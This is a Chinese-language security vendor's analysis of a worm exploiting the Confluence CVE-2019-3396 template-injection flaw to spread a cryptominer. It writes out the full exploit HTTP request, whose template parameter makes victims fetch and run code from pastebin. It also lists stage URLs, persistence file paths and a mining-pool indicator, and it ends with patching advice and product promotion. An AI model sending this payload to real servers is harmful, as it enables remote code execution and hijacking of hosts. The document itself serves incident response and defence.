简介

4月10日下午，阿里云安全监测到一起使用Confluence RCE漏洞(CVE-2019-3396)进行大规模攻击的蠕虫事件，并快速作出响应处理。

Confluence是一个专业的企业知识管理与协同软件，可用于构建企业wiki。本次遭到利用的漏洞，在Confluence产品官网3月20日的Security Advisory中被最初提及，其Widget Connector存在服务端模板注入漏洞，攻击者能利用此漏洞能够实现目录穿越遍历甚至远程命令执行。

从4月8日国内安全研究员根据patch点写出poc并发布，到4月10日大规模蠕虫攻击爆发，中间只隔了短短两天，再次对云平台及用户的快速响应能力构成严峻考验。

本文将对此次蠕虫事件进行分析，并就如何预防类似事件给出安全建议。

蠕虫传播分析

该蠕虫的传播流程如图所示。其手法、程序结构、使用的基础设施，都与先前利用redis攻击的watchdogs蠕虫极度相似，可能是同一作者所为。攻击者首先使用如下payload攻击Confluence服务(CVE-2019-3396):

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host:【victim_host】:【Confluence_port(default 8090)】
Content-Type: application/json; charset=utf-8

{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"https://pastebin.com/raw/KXjybn8M"}}}

该payload导致受害主机运行https://pastebin.com/raw/KXjybn8M中的代码：

随后，攻击者将payload中加粗的url部分替换为https://pastebin.com/raw/cHWdCAw2后，再次对同一台主机发送，执行了以下url中存放的内容：

以上两条导致受害主机请求并执行https://pastebin.com/raw/wDBa7jCQ

综上可知，实际的恶意脚本位置在 https://pastebin.com/raw/xmxHzu5P，判断受害主机架构后，依次尝试使用curl和wget下载恶意程序

恶意程序位于http://sowcar.com/t6/696/1554470400x2890174166.jpg，逆向分析发现其与watchdogs挖矿木马升级版使用了类似的反逆向手段，即程序加upx壳后，改掉magic number；手动将LSD改为UPX后，即可解压。

解压后程序结构如下图，标红部分为攻击传播的蠕虫模块，标蓝部分为在主机上进行持久化的模块，标黄部分则是挖矿模块。

攻击传播的蠕虫模块中，Aago()和Bbgo()进行redis和ssh爆破，Ccgo()则是新添加的Jenkins RCE漏洞(CVE-2019-1003000)利用模块。

持久化模块中，NetdnsWrite()会写入/etc/init.d/netdns文件用于启动恶意程序守护进程；LibWrite()则写入/usr/local/lib/libpamcd.so用于hook各种系统函数；Cron()将下载恶意程序的指令写入cron文件从而定时执行。

挖矿模块会写入/tmp/khugepageds并启动挖矿。

安全建议

1.及时对包括Atlassian Confluence在内的软件和服务进行升级或打补丁。

2.建议使用阿里云安全的下一代云防火墙产品，其阻断恶意外联、能够配置智能策略的功能，能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明，下载、挖矿、反弹shell这些操作，都需要进行恶意外联；云防火墙的拦截将彻底阻断攻击链。此外，用户还可以通过自定义策略，直接屏蔽恶意网站，达到阻断入侵的目的。

此外，云防火墙独有的虚拟补丁功能，能够帮助客户更灵活、更“无感”地阻断攻击。当前云防火墙已上线虚拟补丁支持防御针对Confluence漏洞的攻击，建议用户在虚拟补丁里手动勾选进行开启，如下图所示。

3.对于有更高定制化要求的用户，可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务，定制适合您的方案，帮助加固系统，预防入侵。入侵事件发生后，也可介入直接协助入侵后的清理、事件溯源等，适合有较高安全需求的用户，或未雇佣安全工程师，但希望保障系统安全的企业。

IOC

矿池:
systemtem.org:51640

恶意程序:

Reference

1. https://jira.atlassian.com/browse/CONFSERVER-57974
2. https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html
3. https://paper.seebug.org/884/
4. https://help.aliyun.com/knowledge_detail/114168.html

本文作者：悟泛